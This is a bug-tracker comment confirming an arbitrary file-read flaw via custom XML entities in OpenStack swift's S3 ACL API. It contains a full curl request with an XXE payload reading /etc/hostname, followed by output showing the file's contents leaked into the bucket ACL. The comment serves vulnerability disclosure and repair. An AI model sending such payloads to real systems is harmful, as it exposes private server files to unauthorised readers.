OpenStack Object Storage (swift)

Bug #1998625
Comment #16

Comment 16 for bug 1998625

Revision history for this message

Alistair Coles (alistair-coles) wrote on 2022-12-20: Re: Arbitrary file access through custom S3 XML entities

#16

NOTE: in the original bug description there is a trailing ';' at the end of the <AccessControlPolicy> element that I didn't spot for a while and it cause malformed xml errors.

Confirmed on my vsaio:

```
vagrant@vagrant:~$ curl 'http://saio3:8080/my-bucket?acl=' -X PUT -H "Host: saio3:8080" -H "Content-Type: application/x-www-form-urlencoded; charset=utf-8" -H "X-Amz-Content-Sha256: cfef77034aa96b13190894b26347367d4e95bc3aa2212f467eaae66c75250510" -H "X-Amz-Date: 20221220T193239Z" -H "Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20221220/us-east-1/s3/aws4_request, SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date, Signature=660efe254e6d3210293e778718b5391ca831e2c814c8ec1ebb9300d004430d78" --data-binary '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Owner>
    <DisplayName>test:tester</DisplayName>
    <ID>test:tester</ID>
</Owner>
<AccessControlList>
    <Grant>
        <Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="CanonicalUser">
            <DisplayName>&xxe;</DisplayName>
            <ID>&xxe;</ID>
        </Grantee>
        <Permission>WRITE</Permission>
    </Grant>
</AccessControlList>
</AccessControlPolicy>'
vagrant@vagrant:~$ aws s3api get-bucket-acl --bucket my-bucket
{
    "Owner": {
        "DisplayName": "test:tester",
        "ID": "test:tester"
    },
    "Grants": [
        {
            "Grantee": {
                "DisplayName": "vagrant\n",
                "ID": "vagrant\n",
                "Type": "CanonicalUser"
            },
            "Permission": "WRITE"
        }
    ]
}
```